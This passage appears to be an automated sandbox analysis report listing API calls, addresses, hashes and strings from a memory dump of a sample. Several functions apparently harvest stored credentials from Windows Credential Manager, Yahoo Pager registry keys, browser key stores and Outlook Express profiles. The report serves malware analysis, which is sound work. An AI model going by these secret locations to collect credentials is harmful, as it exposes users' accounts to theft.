                                                                                                                                                                                                                                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75C50A60), ref: 00408EBE
                                                                                                                                                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75C50A60), ref: 00408E31
                                                                                                                                                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                                      • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                                    • API String ID: 2726666094-3614832568
                                                                                                                                                                                                                                    • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                                                                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1786725549-0
                                                                                                                                                                                                                                    • Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                                                                                                                                    • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2014771361-0
                                                                                                                                                                                                                                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                                                                                                                                      • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                                                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                                                                    • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                                                                                                                                    • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                                                                                                                                    • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                                    • String ID: global-salt$password-check
                                                                                                                                                                                                                                    • API String ID: 231171946-3927197501
                                                                                                                                                                                                                                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                                    • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                                                                    • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                                                                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 19018683-0
                                                                                                                                                                                                                                    • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                                    • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                                                                      • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                                                                    • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                                    • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444978
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset$strlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2142929671-0
                                                                                                                                                                                                                                    • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                                                                    • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                                                    • String ID: Passport.Net\*
                                                                                                                                                                                                                                    • API String ID: 2329438634-3671122194
                                                                                                                                                                                                                                    • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                                                                                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                                                                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                                                                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                                                    • String ID: Personalities
                                                                                                                                                                                                                                    • API String ID: 2103853322-4287407858
                                                                                                                                                                                                                                    • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                                                                                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                                                    • API String ID: 1830152886-1703613266
                                                                                                                                                                                                                                    • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                                                                                                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                                                                    • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                                                    • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
